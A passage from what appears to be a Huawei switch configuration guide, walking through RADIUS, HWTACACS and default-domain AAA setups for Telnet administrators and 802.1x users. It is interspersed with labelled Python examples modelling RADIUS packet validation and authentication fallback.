Figure 10-5 Adding network device and AAA client

3. Add a user.
a. Choose Users and Identity Stores > Internal Identity Stores > Users > Create,
as shown in Figure 10-6.


Figure 10-6 Configuring access user

b. Enter the user name, password, and confirm password, and click Submit, as shown
in Figure 10-7.
Figure 10-7 shows the page for adding an 802.1x user. After adding the access user,
add an administrator according to the administrator parameters.

Figure 10-7 Adding a user

4. Add an authentication and authorization profile.


a. Choose Policy Elements > Authorization and Permissions > Network Access >
Authorization Profiles > Create to add an authentication and authorization profile,
as shown in Figure 10-8.
NOTE

When you use the RADIUS protocol, it is recommended that you choose Policy Elements >
Authorization and Permissions > Network Access.
When you use the TACACS+ protocol, it is recommended that you choose Policy Elements >
Authorization and Permissions > Authorization Profiles.

Figure 10-8 Add an authentication and authorization profile

b. Add the authentication and authorization profile for the administrator to specify that
the administrator can log in only through Telnet and has a user privilege of 15.
The settings on the General tab page are shown in Figure 10-9.


Figure 10-9 Setting general parameters for the administrator's authentication and
authorization profile

The settings on the RADIUS Attributes tab page are shown in Figure 10-10. Click
Submit to commit the profile configuration.


Figure 10-10 Setting RADIUS attribute parameters for the administrator's
authentication and authorization profile

c. Add an authentication and authorization profile for the 802.1x user to specify that
the user can log in only through 802.1x, has a user privilege of 2, and is delivered
ACL 3000 and VLAN 100 by the ACS, as shown in Figure 10-11, Figure 10-12, and
Figure 10-13. Click Submit to commit the profile configuration.


Figure 10-11 Setting general parameters for the 802.1x user's authentication and
authorization profile


Figure 10-12 Setting common task parameters for the 802.1x user's authentication
and authorization profile

Figure 10-13 Setting RADIUS attribute parameters for the 802.1x user's
authentication and authorization profile


5. Add an access policy to bind the user to an authentication and authorization profile.
a. Choose Access Policies > Access Services > Create to create an access service.
b. Configure the access service. Set the communication mode to Network Access and
specify the user access protocol, as shown in Figure 10-14 and Figure 10-15.

Figure 10-14 Setting the communication mode to Network Access

NOTE

The S series switches support the first five user access protocols.

Figure 10-15 User access protocols

c. Choose Access Policies > Access Services > Service Selection Rules to create a
rule, as shown in Figure 10-16.


Figure 10-16 Creating a rule

d. Configure the rule. Set the authentication mode to RADIUS and add attributes
according to Figure 10-17.
You can choose Access Policies > Access Services > Service Selection Rules to
prepare the attributes that you want to add.


Figure 10-17 Configuring the rule

Click OK, and then click Save Changes.


e. Select the created access service and click Identity to add an Identity rule, as shown
in Figure 10-18.


Figure 10-18 Creating an Identity rule

f. Configure the rule, as shown in Figure 10-19.


Figure 10-19 Configuring the Identity rule

Click OK, and then click Save Changes.


g. Select the created access service and click Authorization. Configure the
authentication rule for the administrator according to Figure 10-20 or for the 802.1x
user according to Figure 10-21.


Figure 10-20 Configuring authentication rule for administrator


Figure 10-21 Configuring authentication rule for 802.1x user

h. Click OK, and then click Save Changes.


6. Complete the configuration.

Step 3 Check the configuration.


l An administrator logs in to the switch through Telnet.
# Choose Start > Run on your PC and enter cmd to open the Windows command line
interface. Run telnet, and enter the user name admin1 and password Huawei@1234 to
Telnet to the switch.
C:\Documents and Settings\Administrator> telnet 10.1.2.10
Username:admin1
Password:**********
<Switch> //You can log in successfully.

# Run the display access-user username admin1 command to view the rights granted to the user.
l An 802.1x user logs in to the switch.
# Run the test-aaa command on the switch to test whether the user can pass RADIUS
authentication.
[Switch] test-aaa user1@huawei.com Huawei@1234 radius-template 1


# The 802.1x user starts the 802.1x client on the PC, and enters the user name
user1@huawei.com and password Huawei@1234. If the user name and password are
correct, the client displays a successful authentication message. The user can access the
network.
# After the 802.1x user goes online, run the display access-user access-type dot1x
command on the switch to view the user information. The Dynamic VLAN and
Dynamic ACL number(Effective) fields indicate the VLAN and ACL delivered by the
RADIUS server.
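The VLAN and ACL delivery checked in this step, as an added example that is not Huawei's code: a Python model of how a NAS validates the Access-Accept returned by the ACS with the shared key Hello@1234 and reads the delivered VLAN 100 and ACL 3000. It assumes the VLAN arrives in the standard Tunnel-Type, Tunnel-Medium-Type and Tunnel-Private-Group-ID attributes and the ACL number in Filter-Id; the packets and the request authenticator are constructed inline.

```python
"""Added example (not Huawei code): validate a RADIUS Access-Accept and read
the VLAN and ACL it delivers, as a NAS must before applying them."""
import hashlib
import hmac
import struct

ACCESS_ACCEPT = 2
ATTR_FILTER_ID = 11                       # assumed carrier of the ACL number
ATTR_TUNNEL_TYPE = 64
ATTR_TUNNEL_MEDIUM_TYPE = 65
ATTR_TUNNEL_PRIVATE_GROUP_ID = 81
TUNNEL_TYPE_VLAN, TUNNEL_MEDIUM_IEEE802 = 13, 6

SHARED_KEY = b"Hello@1234"                # shared key from Table 10-1
REQUEST_AUTHENTICATOR = bytes(range(16))  # constructed; a real NAS uses 16 random bytes


def encode_attrs(attrs):
    """Serialise (type, value) pairs as RADIUS TLVs (RFC 2865 section 5)."""
    out = b""
    for attr_type, value in attrs:
        if len(value) > 253:
            raise ValueError("attribute value too long")
        out += struct.pack("!BB", attr_type, len(value) + 2) + value
    return out


def decode_attrs(blob):
    """Parse TLVs, rejecting truncated or zero-length entries instead of looping."""
    attrs, pos = [], 0
    while pos < len(blob):
        if pos + 2 > len(blob):
            raise ValueError("truncated attribute header")
        attr_type, length = struct.unpack("!BB", blob[pos:pos + 2])
        if length < 2 or pos + length > len(blob):
            raise ValueError("bad attribute length")
        attrs.append((attr_type, blob[pos + 2:pos + length]))
        pos += length
    return attrs


def tagged(tag, value):
    """Tunnel attribute value: one tag byte (0..31), then a 3-byte int or a string."""
    body = value.to_bytes(3, "big") if isinstance(value, int) else value.encode()
    return bytes([tag]) + body


def build_response(code, ident, request_auth, attrs, secret):
    """ResponseAuth = MD5(Code | ID | Length | RequestAuth | Attributes | Secret)."""
    body = encode_attrs(attrs)
    header = struct.pack("!BBH", code, ident, 20 + len(body))
    response_auth = hashlib.md5(header + request_auth + body + secret).digest()
    return header + response_auth + body


def verify_response(packet, request_auth, secret):
    """The NAS recomputes the Response Authenticator; a key mismatch fails here."""
    if len(packet) < 20 or struct.unpack("!H", packet[2:4])[0] != len(packet):
        return False
    expected = hashlib.md5(packet[:4] + request_auth + packet[20:] + secret).digest()
    return hmac.compare_digest(expected, packet[4:20])


def authorization_from_accept(packet, request_auth, secret):
    """Return {'vlan': int or None, 'acl': str or None}; None for a non-Accept."""
    if not verify_response(packet, request_auth, secret):
        raise ValueError("Response Authenticator mismatch: wrong shared key or altered packet")
    if packet[0] != ACCESS_ACCEPT:
        return None
    tunnel_type, medium, group, acl = {}, {}, {}, None
    for attr_type, value in decode_attrs(packet[20:]):
        if attr_type in (ATTR_TUNNEL_TYPE, ATTR_TUNNEL_MEDIUM_TYPE):
            target = tunnel_type if attr_type == ATTR_TUNNEL_TYPE else medium
            target[value[0]] = int.from_bytes(value[1:], "big")
        elif attr_type == ATTR_TUNNEL_PRIVATE_GROUP_ID:
            # A first byte above 0x1F is string data, not a tag (RFC 2868 section 3.6)
            tag, text = (value[0], value[1:]) if value[0] <= 0x1F else (0, value)
            group[tag] = text.decode()
        elif attr_type == ATTR_FILTER_ID:
            acl = value.decode()
    vlan = None
    for tag, name in group.items():
        # Honour the group as a VLAN only when its tag is typed VLAN over IEEE 802
        if (tunnel_type.get(tag) == TUNNEL_TYPE_VLAN
                and medium.get(tag) == TUNNEL_MEDIUM_IEEE802 and name.isdigit()):
            vlan = int(name)
    return {"vlan": vlan, "acl": acl}


def acs_accept_for_user1(secret=SHARED_KEY, ident=7):
    """Constructed Access-Accept the ACS returns for user1@huawei.com (VLAN 100, ACL 3000)."""
    attrs = [
        (ATTR_TUNNEL_TYPE, tagged(1, TUNNEL_TYPE_VLAN)),
        (ATTR_TUNNEL_MEDIUM_TYPE, tagged(1, TUNNEL_MEDIUM_IEEE802)),
        (ATTR_TUNNEL_PRIVATE_GROUP_ID, tagged(1, "100")),
        (ATTR_FILTER_ID, b"3000"),
    ]
    return build_response(ACCESS_ACCEPT, ident, REQUEST_AUTHENTICATOR, attrs, secret)


if __name__ == "__main__":
    print(authorization_from_accept(acs_accept_for_user1(), REQUEST_AUTHENTICATOR, SHARED_KEY))
```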

----End

Configuration Files
Switch configuration file
#
sysname Switch
#
vlan batch 10 20 30 100
#
telnet server enable
#
acl number 3000
#
radius-server template 1
radius-server shared-key cipher %^%#9nP3;sDW-AN0f@H@S*l&\f{V=V_auKe|^YXy7}bU%^%#
radius-server authentication 10.1.6.6 1812 weight 80
#
aaa
authentication-scheme sch1
authentication-mode radius
domain default_admin
authentication-scheme sch1
radius-server 1
domain huawei.com
authentication-scheme sch1
radius-server 1
#
interface Vlanif10
ip address 10.1.6.10 255.255.255.0
#
interface Vlanif20
ip address 10.1.2.10 255.255.255.0
#
interface Vlanif30
ip address 10.1.3.10 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 20
#
interface GigabitEthernet1/0/3
port link-type hybrid
port hybrid untagged vlan 30
authentication dot1x
dot1x authentication-method eap
#
user-interface maximum-vty 15
user-interface vty 0 14
authentication-mode aaa
protocol inbound telnet


#
return

10.1.5 Example for Configuring Authentication for Telnet Login Users (HWTACACS and Local Authentication)

HWTACACS and Local Authentication Overview


When an HWTACACS authentication server is deployed on a network, users can be
authenticated through HWTACACS. User information is created and maintained by the
HWTACACS authentication server. A user can successfully log in to the device only when
the entered user name and password are the same as those configured on the HWTACACS
server. Compared with RADIUS, HWTACACS is more reliable in transmission and
encryption, and is more suitable for security control. Generally, HWTACACS authentication
is configured on the network requiring high security, for example, financial, government, and
telecommunication carrier networks.
When both HWTACACS authentication and local authentication are configured on a device,
the device performs local authentication if the HWTACACS server does not respond. If only
HWTACACS authentication is configured, users fail the authentication when the device
cannot connect to the HWTACACS server.

Configuration Notes
l This example applies to all S12700 versions.
l NOTE: To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 10-22, an HWTACACS server is deployed on a network, and the
administrator Telnets to the device to remotely manage it. The specific requirements are as
follows:
1. The administrator must enter correct user name and password to log in to the device
through Telnet.
2. The device performs HWTACACS authentication for the administrator first. If the
HWTACACS server does not respond, the device performs local authentication.
3. After logging in to the device through Telnet, the administrator can run the commands at
levels 0-15.

Figure 10-22 Configuring authentication for Telnet login users (HWTACACS and local
authentication)
[Figure 10-22: The administrator on the management network connects to GE1/0/1 (VLANIF10, 10.1.2.10/24) of Switch; GE1/0/2 (VLANIF20, 10.1.6.10/24) connects to the HWTACACS server at 10.1.6.6/24. Administrator account: Username: user1@huawei.com, Password: Huawei@1234.]


Configuration Roadmap
1. Enable the Telnet service.
2. Set the authentication method for Telnet login users to AAA.
3. Configure AAA local authentication, including creating a local user, setting the user
access type to Telnet, and setting the user level to 15.
4. Configure HWTACACS authentication, including creating an HWTACACS server
template, an AAA authentication scheme, and a service scheme, and applying the
schemes to a domain.
NOTE

This example only provides the configurations on the device. Ensure that the required parameters have been
set on the HWTACACS server, for example, device's IP address, shared key, and user information.

Procedure
Step 1 Configure interfaces and assign IP addresses.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20
[Switch] interface vlanif 10
[Switch-Vlanif10] ip address 10.1.2.10 24
[Switch-Vlanif10] quit
[Switch] interface vlanif 20
[Switch-Vlanif20] ip address 10.1.6.10 24
[Switch-Vlanif20] quit
[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] port link-type access
[Switch-GigabitEthernet1/0/1] port default vlan 10
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access
[Switch-GigabitEthernet1/0/2] port default vlan 20
[Switch-GigabitEthernet1/0/2] quit

Step 2 Enable the Telnet server.


[Switch] telnet server enable

Step 3 Set the authentication method for the VTY user interface to AAA.
[Switch] user-interface maximum-vty 15 //Set the maximum number of VTY login
users to 15 (the value range varies according to product versions and models). By
default, the maximum number of Telnet users is 5.
[Switch] user-interface vty 0 14 //Enter the VTY 0-14 user view.
[Switch-ui-vty0-14] authentication-mode aaa //Set the authentication method for
the VTY user view to AAA.
[Switch-ui-vty0-14] protocol inbound telnet //Configure the VTY user interface
to support Telnet. By default, switches in V200R006 and earlier versions support
Telnet, and switches in V200R007 and later versions support SSH.
[Switch-ui-vty0-14] quit

Step 4 Configure AAA local authentication.


[Switch] aaa
[Switch-aaa] local-user user1@huawei.com password irreversible-cipher
Huawei@1234 //Create the local user user1@huawei.com and set the password. The
password is displayed in cipher text in the configuration file, so remember the
password. If you forget the password, run this command again to reconfigure the
password.
[Switch-aaa] local-user user1@huawei.com service-type telnet //Set the access
type of user1@huawei.com to Telnet. The user can log in through only Telnet (by
default, users can log in through any method in versions earlier than V200R007
and cannot log in through any method in V200R007 and later versions).
[Switch-aaa] local-user user1@huawei.com privilege level 15 //Set the user level
of user1@huawei.com to 15. The user can use the commands of level 15 and lower
levels.
[Switch-aaa] quit

Step 5 Configure HWTACACS authentication.

# Configure an HWTACACS server template to implement communication between the
device and the HWTACACS server.
[Switch] hwtacacs-server template 1
[Switch-hwtacacs-1] hwtacacs-server authentication 10.1.6.6 49 //Specify the IP
address and port number of the HWTACACS authentication server.
[Switch-hwtacacs-1] hwtacacs-server shared-key cipher Hello@1234 //Specify the
shared key of the HWTACACS authentication server, which must be the same as that
configured on the HWTACACS server.
[Switch-hwtacacs-1] quit

# Configure an AAA authentication scheme and set the authentication methods to HWTACACS
and local authentication.
[Switch] aaa
[Switch-aaa] authentication-scheme sch1
[Switch-aaa-authen-sch1] authentication-mode hwtacacs local
[Switch-aaa-authen-sch1] quit

# Configure a service scheme and set the user level to 15.


[Switch-aaa] service-scheme sch1
[Switch-aaa-service-sch1] admin-user privilege level 15
[Switch-aaa-service-sch1] quit

# Apply the AAA authentication scheme, HWTACACS server template, and service scheme
to the domain.
[Switch-aaa] domain huawei.com
[Switch-aaa-domain-huawei.com] authentication-scheme sch1
[Switch-aaa-domain-huawei.com] hwtacacs-server 1
[Switch-aaa-domain-huawei.com] service-scheme sch1
[Switch-aaa-domain-huawei.com] quit
[Switch-aaa] quit

Step 6 Verify the configuration.

# Choose Start > Run on your computer running Windows operating system and enter cmd
to open the cmd window. Run the telnet command and enter the user name
user1@huawei.com and password Huawei@1234 to log in to the device through Telnet.
C:\Documents and Settings\Administrator> telnet 10.1.2.10
Username:user1@huawei.com
Password:***********
<Switch> //The administrator successfully logs in.

# Shut down the interface connected to the HWTACACS authentication server, to disconnect
the device from the HWTACACS server. Choose Start > Run on your computer and enter
cmd to open the cmd window. Run the telnet command and enter the user name
user1@huawei.com and password Huawei@1234 to log in to the device through Telnet. You
can successfully log in to the device, indicating that the device performs local authentication
when the HWTACACS server does not respond.
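The fallback behaviour verified in this step, as an added example that is not Huawei's code: a Python model of the authentication-mode hwtacacs local method list, in which only a server that does not respond moves the device on to local authentication, while an explicit reject from the server ends the attempt. The server, its user database and the local-user table are constructed stand-ins for the HWTACACS server at 10.1.6.6 and the aaa view configured above.

```python
"""Added example (not Huawei code): what 'authentication-mode hwtacacs local'
does when the HWTACACS server accepts, rejects, or does not respond."""
from dataclasses import dataclass


@dataclass
class LocalUser:
    """One 'local-user' entry from the aaa view."""
    password: str
    service_types: frozenset   # e.g. {"telnet"} for 'service-type telnet'
    privilege_level: int       # 'privilege level 15'


class HwtacacsServer:
    """Stand-in for the server at 10.1.6.6 port 49 (constructed).
    reachable=False models the shut-down link used in the verification step."""

    def __init__(self, users, reachable=True):
        self.users = users
        self.reachable = reachable

    def authenticate(self, user_name, password):
        if not self.reachable:
            return "timeout"            # no response at all
        if self.users.get(user_name) == password:
            return "accept"
        return "reject"                 # an explicit answer, even if negative


def parse_authentication_mode(line):
    """'authentication-mode hwtacacs local' -> ['hwtacacs', 'local']."""
    words = line.split()
    if len(words) < 2 or words[0] != "authentication-mode":
        raise ValueError("not an authentication-mode line")
    return words[1:]


def aaa_login(user_name, password, access_type, methods, server, local_users,
              service_level=15):
    """Walk the method list in order.

    Only a non-response moves on to the next method; an explicit reject ends
    the attempt immediately, so a wrong password is never retried locally.
    Returns the outcome, the method that decided it, and the command level
    granted ('service-scheme' level for HWTACACS, 'privilege level' for a
    local user).
    """
    for method in methods:
        if method == "hwtacacs":
            answer = server.authenticate(user_name, password)
            if answer == "accept":
                return {"result": "accept", "method": "hwtacacs", "level": service_level}
            if answer == "reject":
                return {"result": "reject", "method": "hwtacacs", "level": None}
            continue                    # timeout: try the next configured method
        if method == "local":
            user = local_users.get(user_name)
            if user is None or user.password != password:
                return {"result": "reject", "method": "local", "level": None}
            if access_type not in user.service_types:
                # 'service-type telnet' means any other access type is refused
                return {"result": "reject", "method": "local", "level": None}
            return {"result": "accept", "method": "local", "level": user.privilege_level}
        raise ValueError(f"unsupported method {method!r}")
    return {"result": "reject", "method": None, "level": None}


# Data from this example: the same account exists on the server and locally.
METHODS = parse_authentication_mode("authentication-mode hwtacacs local")
LOCAL_USERS = {
    "user1@huawei.com": LocalUser("Huawei@1234", frozenset({"telnet"}), 15),
}
SERVER_USERS = {"user1@huawei.com": "Huawei@1234"}   # constructed server database


def scenario(reachable, password="Huawei@1234", access_type="telnet"):
    """Run one login attempt for user1@huawei.com against a server that is up or down."""
    server = HwtacacsServer(SERVER_USERS, reachable=reachable)
    return aaa_login("user1@huawei.com", password, access_type, METHODS,
                     server, LOCAL_USERS)


if __name__ == "__main__":
    print("server up:              ", scenario(True))
    print("server down:            ", scenario(False))
    print("server up, bad password:", scenario(True, password="wrong"))
```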

----End


Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20
#
telnet server enable
#
hwtacacs-server template 1
hwtacacs-server authentication 10.1.6.6
hwtacacs-server shared-key cipher %^%#q(P3<qAXm=Pq).G8bgq@"sbFOf%0k%umgQJ3#MF3%^%#
#
aaa
authentication-scheme sch1
authentication-mode hwtacacs local
service-scheme sch1
admin-user privilege level 15
domain huawei.com
authentication-scheme sch1
service-scheme sch1
hwtacacs-server 1
local-user user1@huawei.com password irreversible-cipher %^%#+bxGT|w}~J-FHdDG"R8"($BX%XF/R1uba0UwL0).&r"Z#zbz*2G1$%6)Rd/V%^%#
local-user user1@huawei.com privilege level 15
local-user user1@huawei.com service-type telnet
#
interface Vlanif10
ip address 10.1.2.10 255.255.255.0
#
interface Vlanif20
ip address 10.1.6.10 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 20
#
user-interface maximum-vty 15
user-interface vty 0 14
authentication-mode aaa
protocol inbound telnet
#
return

10.1.6 Example for Configuring Default Domain-based User Management

Domain and Default Domain Overview


The device manages access users based on domains. Each access user belongs to a domain.
The authentication, authorization, and accounting schemes can be bound to domain views.
The device manages the access users in the same domain in the same manner, for example,
using the same authentication, authorization, and accounting scheme.
As shown in Figure 10-23, a user is authenticated in the specified domain when the entered
user name contains a domain name, or in the default domain when it does not. That is, if a
user name contains a domain name, the user belongs to this domain; otherwise, the user
belongs to the default domain. If most users on a network belong to the same domain, you
can configure this domain as the default domain so that these users do not need to enter the
domain name when logging in to the device.

Default domains are classified into the default administrative domain and the default common domain.

l The administrator (logging in through Telnet, SSH, FTP, HTTP, or Terminal) is
authenticated in the default administrative domain.
By default, the default administrative domain is default_admin.
l The common users (logging in through MAC, Portal, PPP, or 802.1x authentication) are
authenticated in the default common domain.
By default, the default common domain is default.

Figure 10-23 User domains

[Figure 10-23 flow: The user enters the user name user-name@domain-name or user-name. Does the user name contain a domain name? Yes: the user is authenticated in the domain-name domain. No: an administrator is authenticated in the global default administrative domain, and a common user is authenticated in the global default common domain.]

NOTE

You can modify the configuration of the default domains, but you cannot delete the default domains.
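The domain-selection rule of Figure 10-23, as an added example that is not Huawei's code: a Python function that picks the authenticating domain from the entered user name and the access type, looks up the scheme bound to that domain in a constructed table modelled on this section's examples, and shows the effect of undo radius-server user-name domain-included on the user name sent to the server. Splitting at the last "@" and treating an unconfigured domain as unauthenticatable are assumptions.

```python
"""Added example (not Huawei code): which domain authenticates a login, and
what user name the switch forwards to the RADIUS server."""

# Access types the overview lists for administrators and for common users.
ADMIN_ACCESS = frozenset({"telnet", "ssh", "ftp", "http", "terminal"})
COMMON_ACCESS = frozenset({"mac", "portal", "ppp", "dot1x"})

# Constructed table modelled on this section: domain -> authentication mode bound to it.
CONFIGURED_DOMAINS = {
    "default_admin": "local",    # administrators, AAA local authentication
    "default": "radius",         # 802.1x users, RADIUS authentication
    "huawei.com": "radius",
}


def split_user_name(user_name):
    """Return (user_part, domain or None).

    Assumption: the text after the last '@' is the domain name, so
    'a@b@huawei.com' belongs to huawei.com; a trailing '@' with nothing
    after it is treated as no domain.
    """
    if "@" not in user_name:
        return user_name, None
    user_part, domain = user_name.rsplit("@", 1)
    return user_part, (domain or None)


def resolve_domain(user_name, access_type, default_admin="default_admin",
                   default_common="default"):
    """Pick the domain that authenticates this login (the rule of Figure 10-23)."""
    _, domain = split_user_name(user_name)
    if domain is not None:
        return domain                       # name carries a domain: use it
    if access_type in ADMIN_ACCESS:
        return default_admin                # administrator without a domain
    if access_type in COMMON_ACCESS:
        return default_common               # common user without a domain
    raise ValueError(f"unknown access type {access_type!r}")


def authentication_for(user_name, access_type, domains=CONFIGURED_DOMAINS):
    """Return (domain, mode); mode is None when the domain is not configured
    (assumption: such a login cannot be authenticated)."""
    domain = resolve_domain(user_name, access_type)
    return domain, domains.get(domain)


def server_user_name(user_name, domain_included=True):
    """User-Name the switch sends to the RADIUS server; domain_included=False
    is the effect of 'undo radius-server user-name domain-included'."""
    if domain_included:
        return user_name
    return split_user_name(user_name)[0]


if __name__ == "__main__":
    for name, access in (("admin1", "telnet"), ("John", "dot1x"),
                         ("user1@huawei.com", "dot1x")):
        print(name, access, "->", authentication_for(name, access),
              "sent as", server_user_name(name, domain_included=False))
```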

Configuration Notes
l This example applies to all S12700 versions.
l NOTE: To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 10-24, the administrator Telnets to the device and remotely manages the
device after passing AAA local authentication, and 802.1x users log in to the device through
802.1x clients after passing RADIUS authentication. Therefore, both AAA local
authentication and RADIUS authentication need to be configured on the device.

1. The administrator must enter correct user name and password to Telnet to the device.
After logging in to the device, the administrator can run all the commands at levels 0-15.
2. 802.1x users must enter correct user names and passwords to log in to the device.
3. The administrator and 802.1x users do not need to enter domain names when logging in.


Figure 10-24 Configuring default domain-based user management

[Figure 10-24: The administrator (Username: user1, Password: Huawei@1234) on the management network connects to GE1/0/1 (VLANIF20, 10.1.2.10/24) of Switch; GE1/0/2 (VLANIF30, 10.1.6.10/24) connects to the RADIUS server at 10.1.6.6/24; the 802.1x user (Username: John, Password: Hello@5678) on the access network connects to GE1/0/3 (VLANIF10, 10.1.3.10/24).]

Configuration Roadmap
1. Allow the administrator to Telnet to the device.
a. Enable the Telnet service.
b. Set the authentication method for Telnet login users to AAA.
c. Configure AAA local authentication, including creating a local user, setting the user
access type to Telnet, and setting the user level to 15.
2. Allow 802.1x users to log in to the device through RADIUS authentication.
a. Enable 802.1x authentication on the interface.
b. Configure RADIUS authentication, including creating a RADIUS server template,
an AAA authentication scheme, and a service scheme, and applying the schemes to
the default common domain.
NOTE

This example only provides the configurations on the device. Ensure that the required parameters have been
set on the RADIUS server, for example, the device's IP address, the shared key, and the created user.

Procedure
Step 1 Configure interfaces and assign IP addresses.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20 30
[Switch] interface vlanif 10
[Switch-Vlanif10] ip address 10.1.3.10 24
[Switch-Vlanif10] quit
[Switch] interface vlanif 20
[Switch-Vlanif20] ip address 10.1.2.10 24
[Switch-Vlanif20] quit
[Switch] interface vlanif 30
[Switch-Vlanif30] ip address 10.1.6.10 24
[Switch-Vlanif30] quit
[Switch] interface gigabitethernet1/0/1
[Switch-GigabitEthernet1/0/1] port link-type access
[Switch-GigabitEthernet1/0/1] port default vlan 20
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access
[Switch-GigabitEthernet1/0/2] port default vlan 30
[Switch-GigabitEthernet1/0/2] quit
[Switch] interface gigabitethernet1/0/3
[Switch-GigabitEthernet1/0/3] port link-type access
[Switch-GigabitEthernet1/0/3] port default vlan 10
[Switch-GigabitEthernet1/0/3] quit

Step 2 Configure AAA local authentication for the administrator to Telnet to the device.

# Enable the Telnet server.


[Switch] telnet server enable

# Set the authentication method for the VTY user interface to AAA.
[Switch] user-interface maximum-vty 15 //Set the maximum number of VTY login
users to 15 (the value range varies according to product version and model). By
default, the maximum number of Telnet users is 5.
[Switch] user-interface vty 0 14 //Enter the VTY 0-14 user view.
[Switch-ui-vty0-14] authentication-mode aaa //Set the authentication method for
the VTY user view to AAA.
[Switch-ui-vty0-14] protocol inbound telnet //Configure the VTY user interface
to support Telnet. By default, switches in V200R006 and earlier versions support
Telnet, and switches in V200R007 and later versions support SSH.
[Switch-ui-vty0-14] quit

# Configure AAA local authentication.


[Switch] aaa
[Switch-aaa] local-user user1 password irreversible-cipher Huawei@1234 //Create
local user user1 and set the password. The password is displayed in cipher text
in the configuration file, so remember the password. If you forget the password,
run this command again to reconfigure it.
[Switch-aaa] local-user user1 service-type telnet //Set the access type of user1
to Telnet. The user can log in through only Telnet (by default, users can log in
through any method in versions earlier than V200R007 and cannot log in through
any method in V200R007 and later versions).
[Switch-aaa] local-user user1 privilege level 15 //Set the user level of user1
to 15. The user can use the commands of level 15 and lower levels.
[Switch-aaa] quit

NOTE

When the entered user name does not contain a domain name, the device authenticates the user using the
default administrative domain default_admin. By default, the default administrative domain uses the
authentication scheme default and accounting scheme default.
l Authentication scheme default: local authentication
l Accounting scheme default: non-accounting

Step 3 Configure RADIUS authentication for 802.1x users to log in to the device.

# Configure the RADIUS server template to implement communication between the device
and the RADIUS server.
[Switch] radius-server template 1
[Switch-radius-1] radius-server authentication 10.1.6.6 1812 //Specify the IP
address and port number of the RADIUS authentication server.
[Switch-radius-1] radius-server shared-key cipher Hello@1234 //Specify the
shared key of the RADIUS server, which must be the same as that configured on the
RADIUS server.
[Switch-radius-1] quit

NOTE

If the RADIUS server does not accept the user names containing domain names, run the undo radius-server
user-name domain-included command on the device so that the packets sent from the device to the
RADIUS server do not contain domain names.
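To show what the shared key configured above protects, here is an added example (not Huawei code and not part of this guide) of the RADIUS PAP exchange between the switch and the server at 10.1.6.6:1812: the NAS hides the User-Password with the key, the server recovers it and checks its user database, and the NAS accepts a reply only if its Response Authenticator was computed with the same key. The user database, Request Authenticator and identifier are constructed values.

```python
import hashlib
import hmac
import struct

# Constructed: the user the RADIUS server is assumed to hold (test-aaa in Step 4 uses it).
SHARED_KEY = b"Hello@1234"                 # the example's radius-server shared-key
USER_DB = {"liming": b"Hello@5678"}
ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2
USER_NAME, USER_PASSWORD = 1, 2            # RADIUS attribute types (RFC 2865)


def encode_user_password(password, secret, request_auth):
    """RFC 2865 5.2: null-pad to 16-byte blocks, XOR each with MD5(secret + prior block)."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", request_auth
    for i in range(0, len(padded), 16):
        block = bytes(p ^ b for p, b in zip(padded[i:i + 16], hashlib.md5(secret + prev).digest()))
        out, prev = out + block, block
    return out


def decode_user_password(encoded, secret, request_auth):
    """Inverse of encode_user_password; a wrong key yields garbage, not an error."""
    out, prev = b"", request_auth
    for i in range(0, len(encoded), 16):
        chunk = encoded[i:i + 16]
        out += bytes(c ^ b for c, b in zip(chunk, hashlib.md5(secret + prev).digest()))
        prev = chunk
    return out.rstrip(b"\x00")


def attr(code, value):
    return struct.pack("!BB", code, len(value) + 2) + value


def parse_attrs(packet):
    attrs, i = {}, 20                       # attributes start after the 20-byte header
    while i < len(packet):
        code, length = packet[i], packet[i + 1]
        attrs[code], i = packet[i + 2:i + length], i + length
    return attrs


def build_access_request(username, password, secret, request_auth, identifier=1):
    """NAS side: Access-Request carrying User-Name and the hidden User-Password."""
    attrs = attr(USER_NAME, username.encode()) + attr(
        USER_PASSWORD, encode_user_password(password.encode(), secret, request_auth))
    return struct.pack("!BBH", ACCESS_REQUEST, identifier, 20 + len(attrs)) + request_auth + attrs


def response_authenticator(code, identifier, attrs, request_auth, secret):
    """MD5(Code + ID + Length + RequestAuth + Attributes + Secret), RFC 2865 section 3."""
    header = struct.pack("!BBH", code, identifier, 20 + len(attrs))
    return hashlib.md5(header + request_auth + attrs + secret).digest()


def build_access_accept(request, secret, attrs=b""):
    identifier, request_auth = request[1], request[4:20]
    auth = response_authenticator(ACCESS_ACCEPT, identifier, attrs, request_auth, secret)
    return struct.pack("!BBH", ACCESS_ACCEPT, identifier, 20 + len(attrs)) + auth + attrs


def server_authenticate(request, secret, user_db):
    """Server side: recover the password with the shared key and check the user database.
    Returns an Access-Accept, or None where the server would send Access-Reject."""
    attrs = parse_attrs(request)
    name = attrs.get(USER_NAME, b"").decode(errors="replace")
    password = decode_user_password(attrs.get(USER_PASSWORD, b""), secret, request[4:20])
    expected = user_db.get(name)
    if expected is None or not hmac.compare_digest(expected, password):
        return None
    return build_access_accept(request, secret)


def verify_response(response, request, secret):
    """NAS side: accept a reply only if its Response Authenticator was made with our key."""
    if response[1] != request[1]:           # identifier must match the outstanding request
        return False
    expected = response_authenticator(response[0], response[1], response[20:],
                                      request[4:20], secret)
    return hmac.compare_digest(expected, response[4:20])
```

A key mismatch between the two sides therefore shows up either as a rejected user (the server recovers a wrong password) or as a reply the switch discards, which is why the shared key must be identical on both ends.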


# Configure an AAA authentication scheme and set the authentication mode to RADIUS.
[Switch] aaa
[Switch-aaa] authentication-scheme sch1
[Switch-aaa-authen-sch1] authentication-mode radius
[Switch-aaa-authen-sch1] quit

# Configure a service scheme and set the user level to 15.


